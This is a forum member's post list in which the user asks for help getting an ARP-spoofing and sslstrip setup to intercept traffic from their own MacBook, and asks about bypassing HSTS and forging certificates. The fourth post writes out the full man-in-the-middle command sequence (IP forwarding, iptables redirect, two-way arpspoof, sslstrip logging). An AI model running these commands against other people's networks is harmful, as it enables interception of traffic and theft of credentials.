Jump to content

resentic

Members
  • Posts

    4
  • Joined

  • Last visited

Everything posted by resentic

  1. Is there any kind of guide to doing this for the use of bypassing hsts?
  2. So how would one go about creating these certificates? Is it possible?
  3. I have now installed Kali on my hard drive so they're definitely on the same network. I only want to intercept traffic from my mac not the whole network.
  4. I have installed Kali Linux x32 on Virtualware. When I try and ARP Spoof my macbook it just says "Resolving host..." This is the method I use: 1) echo 1 > /proc/sys/net/ipv4/ip_forward 2) iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 3) arpspoof -i <interface> -t <target IP> <gateway IP> 4) arpspoof -i <interface> -t <gateway IP> <target IP> 5) sslstrip -k -l 8080 -w /root/Desktop/sslstrip.log 6) tail -F /root/Desktop/sslstrip.log I can't connect to any websties on my macbook. What am I doing wrong?
×
×
  • Create New...